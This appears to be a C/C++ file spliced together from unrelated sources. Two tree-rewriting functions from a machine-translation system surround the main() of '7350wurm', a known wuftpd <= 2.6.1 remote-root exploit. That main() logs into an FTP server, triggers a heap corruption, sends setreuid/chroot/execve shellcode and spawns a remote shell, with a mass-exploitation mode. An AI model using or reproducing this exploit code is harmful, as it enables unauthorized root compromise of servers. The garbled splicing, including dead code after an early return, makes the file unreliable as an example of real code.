bool CTransTree::ApplyTransLexical( CUStringListRO &list )
{
CUString src_trans_rule = list.GetAt(0);
CUString tgt_trans_rule = list.GetAt(1);
CUStringListRO src_list( src_trans_rule, " " );
CUStringListRO tgt_list( tgt_trans_rule, " " );
int start_idx = -1;
int end_idx = -1;
for( int i=0; i<(int)leaf_node_vec.size()-src_list.GetSize(); i++ ) {
bool match = true;
for( int j=0; j<src_list.GetSize(); j++ ) {
if( leaf_node_vec[i+j]->label != src_list.GetAt(j) ) {
match = false;
break;
}
}
if( match == true ) {
start_idx = i;
end_idx = i+src_list.GetSize()-1;
break;
}
}
if( start_idx != -1 ) {
CTransTreeNode *target_node = root;
while( true ) {
bool changed = false;
for( int i=0; i<(int)target_node->child_vec.size(); i++ ) {
CTransTreeNode* child_node = target_node->child_vec[i];
if( child_node->is_terminal == true ) continue;
if( child_node->span_begin <= start_idx && child_node->span_end >= end_idx ) {
target_node = child_node;
changed = true;
break;
}
}
if( changed == false ) break;
//fprintf( stderr, "Find: %s (%d~%d)\n", target_node->label.GetStr(), start_idx, end_idx );
}
for( int i=(int)target_node->child_vec.size()-1; i>=0; i-- ) {
CTransTreeNode* child = target_node->child_vec[i];
if( child->span_begin >= start_idx && child->span_end <= end_idx ) {
target_node->RemoveChild( child );
}
}
CTransTreeNode* new_child = new CTransTreeNode();
new_child->label = "#";
new_child->is_terminal = true;
new_child->span_begin = start_idx;
new_child->span_end = end_idx;
for( int j=0; j<tgt_list.GetSize(); j++ ) {
if( j > 0 ) new_child->trans += " ";
new_child->trans += tgt_list.GetAt(j);
}
target_node->AddChild( new_child );
/*
CTransTreeNode *target_node = root;
while( true ) {
bool changed = false;
for( int i=0; i<(int)target_node->child_vec.size(); i++ ) {
CTransTreeNode* child_node = target_node->child_vec[i];
if( child_node->span_begin <= start_idx && child_node->span_end >= end_idx ) {
target_node = child_node;
changed = true;
break;
}
}
if( changed == false ) break;
}
root->AddChild( new_child );
*/
}
return true;
vector<CTransTreeNode*> node_stack;
node_stack.push_back( root );
while( node_stack.size() > 0 ) {
CTransTreeNode* node = node_stack.back(); node_stack.pop_back();
fprintf( stderr, "%s\n", node->label.GetStr() );
for( int i=0; i<(int)node->child_vec.size(); i++ ) {
fprintf( stderr, " %s\n", node->child_vec[i]->label.GetStr() );
}
/*
if( node->child_vec.size() == src_list.GetSize() ) {
bool match = true;
for( int a=0; a<src_list.GetSize(); a++ ) {
CUString tmp_str = src_list.GetAt(a);
// lexical
if( tmp_str.Count("/") == 1 ) {
if( node->child_vec[a]->label != tmp_str ) {
match = false;
break;
}
}
// label
else {
if( node->child_vec[a]->label != tmp_str ) {
match = false;
break;
}
}
}
if( match == true ) {
// delete src lexical
for( int i=0; i<node->child_vec.size(); i++ ) {
if( node->child_vec[i]->is_terminal == true ) {
node->RemoveChild( node->child_vec[i] );
}
else {
}
}
// add tgt lexical + src label reorder
for( int i=0; i<tgt_list.GetSize(); i++ ) {
CUString tmp_str = tgt_list.GetAt(i);
if( tmp_str.Count("/") == 1 ) {
CTransTreeNode* new_node = new CTransTreeNode();
new_node->label = "#";
new_node->is_terminal = true;
new_node->trans = tgt_list.GetAt(i);
new_node->parent = node;
new_node->trans_order = i;
node->AddChild( new_node );
}
else {
if( tmp_str == "@1" ) {
CTransTreeNode* tmp_node = node->GetNthNonterminal( 1 );
if( tmp_node == NULL ) {
//fprintf( stderr, "fail @1 %d\n", i );
}
else {
//fprintf( stderr, "succ %s %d\n", tmp_node->label.GetStr(), i );
tmp_node->trans_order = i;
}
}
else if( tmp_str == "@2" ) {
CTransTreeNode* tmp_node = node->GetNthNonterminal( 2 );
if( tmp_node == NULL ) {
//fprintf( stderr, "fail @2 %d\n", i );
}
else {
//fprintf( stderr, "succ %s %d\n", tmp_node->label.GetStr(), i );
tmp_node->trans_order = i;
}
}
}
}
}
}
*/
for( int i=0; i<(int)node->child_vec.size(); i++ ) {
node_stack.push_back( node->child_vec[i] );
}
}
return true;
}
int
main (int argc, char *argv[])
{
char c;
char * progname; /* = argv[0] */
int fd;
tgt_type * tgt = NULL;
int tgt_num = -1;
unsigned char xpbuf[512 + 16];
fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
"(version "VERSION")\n"
"team teso (thx bnuts, tomas, synnergy.net !).\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
switch (c) {
case 'h':
usage (progname);
break;
case 'a':
automode = 1;
break;
case 'D':
debugmode = 1;
break;
case 'v':
verbose += 1;
break;
case 'm':
mass = 1;
break;
case 't':
if (sscanf (optarg, "%u", &tgt_num) != 1)
usage (progname);
break;
case 'u':
username = "******";
printf ("username = %s\n", optarg);
break;
case 'p':
password = optarg;
break;
case 'd':
dest = optarg;
break;
case 'L':
if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
usage (progname);
break;
case 'A':
if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
usage (progname);
break;
default:
usage (progname);
break;
}
}
/* if both required offsets are given manually, then we dont have
* to require a target selection. otherwise check whether the target
* is within the list. if its not, then print a list of available
* targets
*/
if (user_retloc != 0 && user_retaddr != 0) {
tgt = &tmanual;
} else if (automode == 0 && (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. list:\n\n");
tgt_list ();
exit (EXIT_SUCCESS);
}
if (tgt == NULL && automode == 0)
tgt = &targets[tgt_num - 1];
if (mass == 1) {
if ((argc - optind) == 0)
usage (progname);
mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
x86_lnx_execve, &argv[optind]);
if (mlen >= 0xff) {
fprintf (stderr, "created argv-code too long "
"(%d bytes)\n", mlen);
exit (EXIT_FAILURE);
}
fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
}
printf ("# trying to log into %s with (%s/%s) ...", dest,
username, password);
fflush (stdout);
fd = ftp_login (dest, username, password);
if (fd <= 0) {
fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
exit (EXIT_FAILURE);
}
printf (" connected.\n");
if (debugmode) {
printf ("DEBUG: press enter\n");
getchar ();
}
printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
ftp_banner);
if (tgt == NULL && automode) {
tgt = tgt_frombanner (ftp_banner);
if (tgt == NULL) {
printf ("# failed to jield target from banner, aborting\n");
exit (EXIT_FAILURE);
}
printf ("# successfully selected target from banner\n");
}
if (shellcode == NULL) {
shellcode = tgt->shellcode;
shellcode_len = tgt->shellcode_len;
}
if (verbose >= 2) {
printf ("using %lu byte shellcode:\n", shellcode_len);
hexdump ("shellcode", shellcode, shellcode_len);
}
if (user_retaddr != 0) {
fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
user_retaddr);
}
if (user_retloc != 0) {
fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
user_retloc);
tgt->retloc = user_retloc;
}
printf ("\n### TARGET: %s\n\n", tgt->desc);
/* real stuff starts from here
*/
printf ("# 1. filling memory gaps\n");
xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
exploit (fd, tgt);
printf ("# 3. triggering free(globlist[1])\n");
net_write (fd, "CWD ~{\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
if (strncmp (xpbuf, "sP", 2) != 0) {
fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
xpbuf);
exit (EXIT_FAILURE);
}
printf ("#\n# exploitation succeeded. sending real shellcode\n");
if (mass == 1) {
printf ("# mass mode, sending constructed argv code\n");
write (fd, mcode, mlen);
printf ("# send. sleeping 10 seconds\n");
sleep (10);
printf ("# success.\n");
exit (EXIT_SUCCESS);
}
printf ("# sending setreuid/chroot/execve shellcode\n");
net_write (fd, "%s", x86_lnx_shell);
printf ("# spawning shell\n");
printf ("##################################################"
"##########################\n");
write (fd, INIT_CMD, strlen (INIT_CMD));
shell (fd);
exit (EXIT_SUCCESS);
}
bool CTransTree::ApplyTransRule( CUStringListRO &list )
{
CUString src_trans_rule = list.GetAt(0);
CUString tgt_trans_rule = list.GetAt(1);
CUStringListRO src_list( src_trans_rule, " " );
CUStringListRO tgt_list( tgt_trans_rule, " " );
vector<CTransTreeNode*> node_stack;
node_stack.push_back( root );
while( node_stack.size() > 0 ) {
CTransTreeNode* node = node_stack.back(); node_stack.pop_back();
/*
fprintf( stderr, "%s\n", node->label.GetStr() );
for( int i=0; i<(int)node->child_vec.size(); i++ ) {
fprintf( stderr, " %s\n", node->child_vec[i]->label.GetStr() );
}
*/
if( node->child_vec.size() == src_list.GetSize() ) {
bool match = true;
for( int a=0; a<src_list.GetSize(); a++ ) {
CUString tmp_str = src_list.GetAt(a);
// lexical
if( tmp_str.Count("/") == 1 ) {
if( node->child_vec[a]->label != tmp_str ) {
match = false;
break;
}
}
// label
else {
if( node->child_vec[a]->label != tmp_str ) {
match = false;
break;
}
}
}
if( match == true ) {
// delete src lexical
for( int i=(int)node->child_vec.size()-1; i>=0; i-- ) {
if( node->child_vec[i]->is_terminal == true ) {
node->RemoveChild( node->child_vec[i] );
}
else {
}
}
// add tgt lexical + src label reorder
for( int i=0; i<tgt_list.GetSize(); i++ ) {
CUString tmp_str = tgt_list.GetAt(i);
if( tmp_str.Count("/") == 1 ) {
CTransTreeNode* new_node = new CTransTreeNode();
new_node->label = "#";
new_node->is_terminal = true;
new_node->trans = tgt_list.GetAt(i);
new_node->parent = node;
new_node->trans_order = i;
node->AddChild( new_node );
}
else {
if( tmp_str == "@1" ) {
CTransTreeNode* tmp_node = node->GetNthNonterminal( 1 );
if( tmp_node == NULL ) {
//fprintf( stderr, "fail @1 %d\n", i );
}
else {
//fprintf( stderr, "succ %s %d\n", tmp_node->label.GetStr(), i );
tmp_node->trans_order = i;
}
}
else if( tmp_str == "@2" ) {
CTransTreeNode* tmp_node = node->GetNthNonterminal( 2 );
if( tmp_node == NULL ) {
//fprintf( stderr, "fail @2 %d\n", i );
}
else {
//fprintf( stderr, "succ %s %d\n", tmp_node->label.GetStr(), i );
tmp_node->trans_order = i;
}
}
}
}
}
}
for( int i=0; i<(int)node->child_vec.size(); i++ ) {
node_stack.push_back( node->child_vec[i] );
}
}
return true;
}
